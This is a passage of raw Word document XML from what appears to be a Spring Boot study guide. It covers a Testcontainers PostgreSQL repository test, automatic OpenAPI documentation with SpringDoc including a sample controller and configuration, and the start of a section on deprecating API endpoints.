      </w:r>
    </w:p>
    <w:p w14:paraId="5FDF827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BootTest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9C8C9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utoConfigureTestDatabase(replace = AutoConfigureTestDatabase.Replace.NONE) // Disable default H2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCB08C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Testcontainers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541D68E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lass EmployeeRepositoryTest {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074F3EBE" w14:textId="77777777" w:rsidR="001F49B3" w:rsidRPr="001F49B3" w:rsidRDefault="001F49B3" w:rsidP="001F49B3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0626AF0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utowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1516702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rivate EmployeeRepository employeeRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D82C68" w14:textId="77777777" w:rsidR="001F49B3" w:rsidRPr="001F49B3" w:rsidRDefault="001F49B3" w:rsidP="001F49B3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="382C4EC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Container</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D6D63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tatic PostgreSQLContainer&lt;?&gt; postgreSQLContainer = new PostgreSQLContainer&lt;&gt;("postgres:15.4")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE52FC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DatabaseName("testdb")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5567EFA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Username("test")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F613F7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ithPassword("test");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CBBC3A" w14:textId="77777777" w:rsidR="001F49B3" w:rsidRPr="001F49B3" w:rsidRDefault="001F49B3" w:rsidP="001F49B3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4300BF4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Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB8030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oid testSaveEmployee() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445A034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 employee = new Employee();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3BC64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setName("John Doe");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3280B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setRole("Developer");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287FB32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4609E45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Employee savedEmployee = employeeRepository.save(employee);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0489EEB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A98C2A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NotNull(savedEmployee.getId());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117002B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Equals("John Doe", savedEmployee.getName());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1124167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07ECF17" w14:textId="77777777" w:rsidR="001F49B3" w:rsidRPr="001F49B3" w:rsidRDefault="001F49B3" w:rsidP="001F49B3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BDB628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Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5E845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oid testFindAllEmployees() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1708E90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List&lt;Employee&gt; employees = employeeRepository.findAll();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDFCA1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ssertTrue(employees.isEmpty());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6357CDE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A8428E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7B223960"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8DA02F">
          <v:rect id="_x0000_i2755" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0003B2"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6. Configure Testcontainers in Tests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9AAC3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Testcontainers at the class level to enable support, and @Container to define the database container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACC9644"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6E07F">
          <v:rect id="_x0000_i2756" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AD66A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7. Run the Tests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5848C89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Execute the tests using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B456A6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radlew test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3110E2A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F5588">
          <v:rect id="_x0000_i2757" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD47264"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Advantages of Using Testcontainers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44354F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Isolation:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F49B3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Runs in Docker, avoiding conflicts with local environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4A082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onsistency:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F49B3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The same environment runs locally and in CI/CD.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F27B44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Flexibility:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F49B3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Easily switch database versions or types.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413D030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Lifecycle Management:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F49B3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Starts and stops containers automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA92211"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Best Practices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8CC4C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DynamicPropertySource to dynamically configure database properties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366722D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lways annotate with @Testcontainers and use @Container to define containers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB0BD0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Use @AutoConfigureTestDatabase(replace = AutoConfigureTestDatabase.Replace.NONE) to disable H2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD4014D"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58CAC">
          <v:rect id="_x0000_i2758" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6342DE1B" w14:textId="0C960701"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6" w:name="_Toc197867900"/>
      <w:r w:rsidRPr="00E5597A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How do you automate the generation of Open API directly from your Spring boot code using library Spring doc Open API</w:t>
      </w:r>
      <w:r w:rsidR="00187C12" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="686"/>
    </w:p>
    <w:p w14:paraId="03A3AA95" w14:textId="66ED18EB" w:rsidR="001F49B3" w:rsidRPr="001F49B3" w:rsidRDefault="001F49B3" w:rsidP="00DF27C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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To automate the generation of OpenAPI documentation directly from your Spring Boot code, you can use </w:t>
      </w:r>
      <w:r w:rsidRPr="001F49B3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SpringDoc OpenAPI</w:t>
      </w:r>
      <w:r w:rsidRPr="001F49B3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. This library integrates seamlessly with Spring Boot and automatically generates API documentation from your code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D3BE97"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558E4">
          <v:rect id="_x0000_i2759" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4383FE"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1. Add Dependencies (Gradle)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2B78A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Include the following in your build.gradle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C035D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dependencies {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DD981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mplementation 'org.springdoc:springdoc-openapi-starter-webmvc-ui:2.2.0'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511FE23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mplementation 'org.springframework.boot:spring-boot-starter-web'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F359B8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69BDA63"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AFE044">
          <v:rect id="_x0000_i2760" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3415F416"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2. Spring Boot Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4941CDF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automatically generates OpenAPI documentation without requiring additional configuration. However, you can customize it using application properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C86DAE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application.yml:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8A061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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3618CFE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docs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70ED0DE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 xml:space="preserve">    path: /api-docs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513A9B0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swagger-ui:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505B169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ath: /swagger-ui.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517F7D85"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B8ECF">
          <v:rect id="_x0000_i2761" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FF3428"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3. Create a Sample REST Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3380980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will automatically scan your REST endpoints and generate documentation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675538E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RestController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B74F97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RequestMapping("/api/employees")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61942F1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EmployeeController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE04B4C" w14:textId="77777777" w:rsidR="001F49B3" w:rsidRPr="001F49B3" w:rsidRDefault="001F49B3" w:rsidP="001F49B3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13B55B5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GetMapping("/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7D929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getEmployeeById(@PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6E567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with ID: " + id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F9083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5ABD54A3" w14:textId="77777777" w:rsidR="001F49B3" w:rsidRPr="001F49B3" w:rsidRDefault="001F49B3" w:rsidP="001F49B3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C64DA91"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ostMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3421AEF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createEmployee(@RequestBody String employee) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B42F03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status(HttpStatus.CREATED).body("Employee created: " + employee);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2206FCD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011EDC84" w14:textId="77777777" w:rsidR="001F49B3" w:rsidRPr="001F49B3" w:rsidRDefault="001F49B3" w:rsidP="001F49B3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17FE529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eleteMapping("/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B39C9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ResponseEntity&lt;String&gt; deleteEmployee(@PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8B062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deleted with ID: " + id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6377548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73F29F2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3DCFED03"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26992">
          <v:rect id="_x0000_i2762" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC46A1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4. Access the API Documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462825E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fter starting your Spring Boot application, you can access the auto-generated OpenAPI documentation at:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4274C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Swagger UI:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F49B3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://localhost:8080/swagger-ui.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49867458"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OpenAPI JSON:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F49B3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://localhost:8080/api-docs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462A387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OpenAPI YAML:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F49B3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://localhost:8080/api-docs.yaml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC45D81"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90618">
          <v:rect id="_x0000_i2763" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="744413D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5. Customizing API Documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BB556F"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nnotate your controller methods for better API documentation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C9743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Operation(summary = "Get an employee by ID")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267D3E2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ApiResponses(value = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC6FB0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Response(responseCode = "200", description = "Found the employee"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4599C5C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ApiResponse(responseCode = "404", description = "Employee not found")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3744B1D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61676370"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etMapping("/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565EB3D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ResponseEntity&lt;String&gt; getEmployeeById(@PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A259453"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ResponseEntity.ok("Employee with ID: " + id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB7F27E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DEAA68"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6B8A74">
          <v:rect id="_x0000_i2764" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="663C416E"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6. Add Global API Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A6F72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You can also customize global API information using a configuration class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10642CA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Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E11867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public class OpenApiConfig {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31614D5E" w14:textId="77777777" w:rsidR="001F49B3" w:rsidRPr="001F49B3" w:rsidRDefault="001F49B3" w:rsidP="001F49B3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CE1CE9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Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC0311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public OpenAPI customOpenAPI() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5128AB27"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return new OpenAPI()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203AE8F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info(new Info().title("Employee API")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F08E20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description("Employee Management Service")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D37E7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version("1.0"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A7218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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BDF569"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lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767C8DE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AB65C6">
          <v:rect id="_x0000_i2765" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="235D42DF"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7. Testing the API Documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDB180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tart your application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3605DC"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gradlew bootRun</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468B94AD"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 xml:space="preserve">Visit the </w:t>
      </w:r>
      <w:r w:rsidRPr="001F49B3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Swagger UI</w:t>
      </w:r>
      <w:r w:rsidRPr="001F49B3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D37CD2"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http://localhost:8080/swagger-ui.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13688B8A" w14:textId="77777777" w:rsidR="001F49B3" w:rsidRPr="001F49B3" w:rsidRDefault="00000000" w:rsidP="001F49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C2A68">
          <v:rect id="_x0000_i2766" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBDDB5D" w14:textId="77777777" w:rsidR="001F49B3" w:rsidRPr="001F49B3" w:rsidRDefault="001F49B3" w:rsidP="001F49B3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F49B3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Key Advantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A955B66"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Automatic Generation:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F49B3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> No manual writing of API docs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE01F04"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Interactive Interface:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F49B3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> View and test APIs through Swagger UI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17129075"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ustomizability:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F49B3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Add descriptions, summaries, and response messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3C8E3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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consistency:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F49B3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Keeps API documentation synchronized with your code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342929FA" w14:textId="77777777" w:rsidR="001F49B3" w:rsidRPr="001F49B3" w:rsidRDefault="001F49B3" w:rsidP="001F49B3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F49B3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SpringDoc OpenAPI simplifies the documentation process, enabling you to focus on building robust RESTful services without worrying about manually writing API specifications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395165FC"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D26ED7">
          <v:rect id="_x0000_i2767" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C258F4" w14:textId="3D129DD4"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7" w:name="_Toc197867901"/>
      <w:r w:rsidRPr="00E5597A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How do you implement the strategy for deprecated API endpoints gracefully</w:t>
      </w:r>
      <w:r w:rsidR="00187C12" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="687"/>
    </w:p>
    <w:p w14:paraId="6A53DEF9" w14:textId="3716121C" w:rsidR="00122084" w:rsidRPr="00122084" w:rsidRDefault="00122084" w:rsidP="00AC7D81">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Handling deprecated API endpoints gracefully in a Spring Boot application requires a strategy that notifies users while ensuring backward compatibility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9DF144"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1. Strategy for Deprecation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3D8C6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Mark as Deprecated:</w:t>
      </w:r>
      <w:r w:rsidRPr="00122084">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Clearly indicate which endpoints are deprecated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603F347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Provide Alternatives:</w:t>
      </w:r>
      <w:r w:rsidRPr="00122084">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Suggest new endpoints or versions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CB8660"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Graceful Degradation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00122084">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Keep deprecated endpoints functional for a limited time.</w:t>
      </w:r>
    </w:p>
